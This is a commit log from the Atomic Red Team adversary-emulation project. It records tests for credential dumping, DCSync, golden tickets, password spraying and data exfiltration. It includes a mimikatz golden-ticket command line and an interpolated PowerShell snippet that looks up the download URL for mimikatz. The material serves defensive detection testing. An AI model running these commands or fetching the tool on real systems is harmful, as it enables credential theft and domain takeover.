Michael Haag
373176bcba
T1490 - WBAdmin (#1375)
* Added wbadmin delete systemstatebackup
* Update T1490.yaml
Co-authored-by: mhaag-spl <76067280+mhaag-spl@users.noreply.github.com>
2021-01-23 17:53:20 -07:00
CircleCI Atomic Red Team doc generator
57ba7350b8
Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-22 16:30:47 +00:00
MrOrOneEquals1
22c65f4acd
Fix to Cleanup Command for T1003.002 Test Number 3 (#1374)
2021-01-22 09:30:13 -07:00
CircleCI Atomic Red Team doc generator
7570e02911
Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-21 18:48:01 +00:00
BlueTeamOps
89de74b637
Updated Offline Credential Theft with mimikatz (#1373)
Updated the command segment related to guid: 453acf13-1dbd-47d7-b28a-172ce9228023
Existing request URL path doesn't exist in gentilkiwi's repo. Added code segment will obtain the latest mimikatz_trunk.zip from the repo.
I have repurposed the code segment done by Xiang ZHU https://copdips.com/2019/12/Using-Powershell-to-retrieve-latest-package-url-from-github-releases.html to meet the requirements here.
Co-authored-by: Michael Haag <5632822+MHaggis@users.noreply.github.com>
2021-01-21 11:47:28 -07:00
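The commit above replaces a hard-coded release path with a lookup of the latest mimikatz_trunk.zip. The following PowerShell is an added example of that lookup, not the atomic's own code or the snippet by Xiang ZHU it was adapted from. It queries the GitHub Releases API for gentilkiwi/mimikatz (a real endpoint) and picks the asset by name; the JSON sample embedded in the block is constructed so the selection logic can be exercised offline, and the tag name in it is made up.

```powershell
# Added example: resolve the download URL of a named asset on the latest GitHub
# release instead of hard-coding a release path that can be deleted later.
# Repo slug, asset name and API host are real; $sampleRelease is constructed.

function Select-ReleaseAssetUrl {
    param(
        [Parameter(Mandatory)] $Release,              # object shaped like the API's release JSON
        [Parameter(Mandatory)] [string] $AssetName
    )
    $asset = $Release.assets | Where-Object { $_.name -eq $AssetName } | Select-Object -First 1
    if (-not $asset) {
        throw "Release '$($Release.tag_name)' has no asset named '$AssetName'"
    }
    return $asset.browser_download_url
}

function Get-LatestMimikatzUrl {
    param(
        [string] $Repo      = 'gentilkiwi/mimikatz',
        [string] $AssetName = 'mimikatz_trunk.zip'
    )
    # GitHub rejects requests without a User-Agent; TLS 1.2 is required by api.github.com
    # and is not the default on older Windows PowerShell hosts.
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
    $release = Invoke-RestMethod -Uri "https://api.github.com/repos/$Repo/releases/latest" `
                                 -Headers @{ 'User-Agent' = 'atomic-red-team-prereq' }
    return Select-ReleaseAssetUrl -Release $release -AssetName $AssetName
}

# Constructed sample of /releases/latest, trimmed to the fields the functions use.
$sampleRelease = @'
{ "tag_name": "0.0.0-sample",
  "assets": [
    { "name": "mimikatz_trunk.7z",
      "browser_download_url": "https://github.com/gentilkiwi/mimikatz/releases/download/0.0.0-sample/mimikatz_trunk.7z" },
    { "name": "mimikatz_trunk.zip",
      "browser_download_url": "https://github.com/gentilkiwi/mimikatz/releases/download/0.0.0-sample/mimikatz_trunk.zip" }
  ] }
'@ | ConvertFrom-Json

# Offline check: the .zip asset is chosen even though the .7z asset is listed first.
$url = Select-ReleaseAssetUrl -Release $sampleRelease -AssetName 'mimikatz_trunk.zip'
Write-Host "Sample release resolves to: $url"

# Live use (needs network). Download next to where the atomic's cleanup looks, then
# confirm the file really is a zip before relying on it in the test.
# $live = Get-LatestMimikatzUrl
# Invoke-WebRequest -Uri $live -OutFile "$env:TEMP\mimikatz_trunk.zip" -UseBasicParsing
# if (-not (Test-Path "$env:TEMP\mimikatz_trunk.zip")) { throw "download failed" }
```

Because the asset is matched by name rather than by position, the lookup keeps working if the project adds or reorders release artifacts; it still breaks, with a clear error, if the .zip is ever renamed, which is the failure the original hard-coded URL hit silently.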
CircleCI Atomic Red Team doc generator
05d2071e23
Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-20 23:27:31 +00:00
CircleCI Atomic Red Team GUID generator
52945641c0
Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-20 23:27:23 +00:00
Carrie Roberts
63d1e555d4
MSbuild inline task using Visual Basic (#1371)
* add visual basic test
* correct comment
2021-01-20 16:26:45 -07:00
CircleCI Atomic Red Team doc generator
bc705cb7aa
Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-13 19:14:46 +00:00
Carrie Roberts
1f26ebdb6c
typo corrections (#1367)
addresses issues #1365
Co-authored-by: Michael Haag <5632822+MHaggis@users.noreply.github.com>
2021-01-13 12:14:14 -07:00
CircleCI Atomic Red Team doc generator
fca809efa6
Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-13 19:12:56 +00:00
Carrie Roberts
5c52612858
added details to the description (#1366)
Co-authored-by: Michael Haag <5632822+MHaggis@users.noreply.github.com>
2021-01-13 12:12:24 -07:00
CircleCI Atomic Red Team doc generator
be8d3644f2
Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-13 19:11:35 +00:00
CircleCI Atomic Red Team GUID generator
06ce6b9f11
Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-13 19:11:27 +00:00
JimmyAstle
030040bf73
Out minidump (#1368)
* Adding a test of Out-Minidump.ps1
Adding in a credential dumping test that leverages Out-Minidump.ps1 to dump the contents of lsass to disk for offline extraction
* Fixing cleanup path
Path is actually %TEMP%
Co-authored-by: jimmy astle <jastle@vmware.com>
2021-01-13 12:11:12 -07:00
CircleCI Atomic Red Team doc generator
471d30b4f3
Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-13 03:23:42 +00:00
Brian Thacker
3f8e909392
T1560.001 prereqs tests1 2 4 (#1363)
* Update T1560.001.yaml
Changed Test 1 to do a silent install of winrar. Added prereqs to Test 2 to install winrar.
* Update T1560.001.yaml
Added prereq commands to Test 4 to download and install 7zip.
* Update T1560.001.yaml
changed command in test 4 to stop endlessly adding new files to the archive
* Update T1560.001.yaml
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2021-01-12 20:22:57 -07:00
CircleCI Atomic Red Team doc generator
371eb3d609
Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-11 03:40:28 +00:00
Brian Thacker
fa7f19ad7f
Update T1218.010.yaml (#1364)
Fix typo in command to avoid errors
2021-01-10 20:30:57 -07:00
CircleCI Atomic Red Team doc generator
9c1f9f733c
Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-08 16:51:05 +00:00
Clément Notin
18087c9ad8
Add DCShadow args for attribute and value (#1362)
It gives more choice in what to change instead of fixed "badpwdcount" and "9999"
Also rename "user" to "object" as it is more generic than only user objects
2021-01-08 09:50:18 -07:00
CircleCI Atomic Red Team doc generator
96f61076f9
Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-08 16:42:27 +00:00
CircleCI Atomic Red Team GUID generator
79f6986b1a
Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-08 16:42:19 +00:00
Itamar
42472533fa
Update T1048.003.yaml (#1357)
Hi,
I added two atomic tests for exfiltration using HTTP and SMTP.
1. Exfiltration Over Alternative Protocol - HTTP
2. Exfiltration Over Alternative Protocol - SMTP
Itamar
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2021-01-08 09:41:50 -07:00
CircleCI Atomic Red Team doc generator
c21c1ba13e
Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-08 16:23:16 +00:00
Michael Haag
a5af0cc644
Update T1218.010.yaml (#1359)
Modified T1218.010 to allow for modification of path and name of regsvr32.exe
Co-authored-by: mhaag-spl <76067280+mhaag-spl@users.noreply.github.com>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2021-01-08 09:22:48 -07:00
Michael Haag
bbcf685889
Update T1055.cs (#1361)
dll was named incorrectly in .cs. Fixed and confirmed operational.
Co-authored-by: mhaag-spl <76067280+mhaag-spl@users.noreply.github.com>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2021-01-08 09:19:55 -07:00
CircleCI Atomic Red Team doc generator
c0591491f1
Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-08 16:16:04 +00:00
Michael Haag
39954ec1af
Update T1218.yaml (#1360)
Updated microsoft.workflow.compiler.exe test
Co-authored-by: mhaag-spl <76067280+mhaag-spl@users.noreply.github.com>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2021-01-08 09:15:29 -07:00
CircleCI Atomic Red Team doc generator
9660d0a33e
Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-08 16:12:45 +00:00
CircleCI Atomic Red Team GUID generator
abfd1e042b
Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-08 16:12:36 +00:00
Ama Smuggle Avocados
d721e09ede
Scriptcontrol (#1348)
* initial
* updates
* initial
* update
* updates
* updates
* updates
* updates
* updates
* updates
* updates
* updates
* updates
* updates
* Update T1204.002.yaml
* Update T1204.002.yaml
* updates
* remove code
* correct url
* works with 32bit Chrome, simplified commands
Co-authored-by: avocado <avocados@smuggler.com>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2021-01-08 09:12:14 -07:00
CircleCI Atomic Red Team doc generator
5cc2b5a88d
Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-07 16:43:14 +00:00
CircleCI Atomic Red Team GUID generator
ed7d3faabd
Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-07 16:43:06 +00:00
Carrie Roberts
6f40ae85f5
solarigate atomic (#1358)
2021-01-07 09:42:43 -07:00
CircleCI Atomic Red Team doc generator
fb179a30a8
Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-06 19:39:15 +00:00
CircleCI Atomic Red Team GUID generator
a3ad539a58
Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-06 19:39:08 +00:00
Clément Notin
7c1471c403
T1110.001: add test "Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos)" (#1354)
Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
Co-authored-by: Clément Notin <clement.notin@alsid.com>
Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
2021-01-06 12:38:52 -07:00
CircleCI Atomic Red Team doc generator
4dbcb20934
Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-06 18:51:58 +00:00
CircleCI Atomic Red Team GUID generator
a4ca274d7d
Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-06 18:51:49 +00:00
Clément Notin
c71444f1dc
T1110.003: add test "Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos)" (#1349)
Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
Co-authored-by: Clément Notin <clement.notin@alsid.com>
Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
2021-01-06 11:51:31 -07:00
CircleCI Atomic Red Team doc generator
0b9d36e786
Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-06 18:47:31 +00:00
CircleCI Atomic Red Team GUID generator
9a59eac0b8
Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-06 18:47:22 +00:00
Clément Notin
d5b6e69f89
T1003.006: add DCSync test (#1352)
Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
Co-authored-by: Clément Notin <clement.notin@alsid.com>
Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
2021-01-06 11:46:59 -07:00
CircleCI Atomic Red Team doc generator
603040c6e3
Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-06 18:42:39 +00:00
CircleCI Atomic Red Team GUID generator
90611a079a
Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-06 18:42:30 +00:00
Clément Notin
b0a0bbc66e
T1055: add new test "Remote Process Injection in LSASS via mimikatz" (#1353)
Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
Co-authored-by: Clément Notin <clement.notin@alsid.com>
Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
2021-01-06 11:42:08 -07:00
CircleCI Atomic Red Team doc generator
443e0318fc
Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-06 18:35:50 +00:00
CircleCI Atomic Red Team GUID generator
7ef584f9fd
Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
2021-01-06 18:35:42 +00:00
Clément Notin
d50239ff57
T1558.001: add test "Golden ticket" (#1351)
* T1558.001: add test "Golden ticket"
Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
Co-authored-by: Clément Notin <clement.notin@alsid.com>
* Add support for default domain SID (one less parameter to specify)
With default:
invoke-atomictest T1558.001 -InputArgs @{ "domain" = "lab.lan" ; "krbtgt_aes256_key"="xxxxx" }
[...]
mimikatz(commandline) # kerberos::golden /domain:lab.lan /sid:S-1-5-21-1891480667-311803191-3341389180 /aes256:xxxxx /user:goldenticketfakeuser /ptt
With specific SID ("toto"):
invoke-atomictest T1558.001 -InputArgs @{ "domain" = "lab.lan" ; "krbtgt_aes256_key"="xxxxx" ; "domain_sid"="toto" }
[...]
mimikatz(commandline) # kerberos::golden /domain:lab.lan /sid:toto /aes256:xxxxx /user:goldenticketfakeuser /ptt
Co-authored-by: Zakaria Addi <zakaria.addi@alsid.com>
2021-01-06 11:35:14 -07:00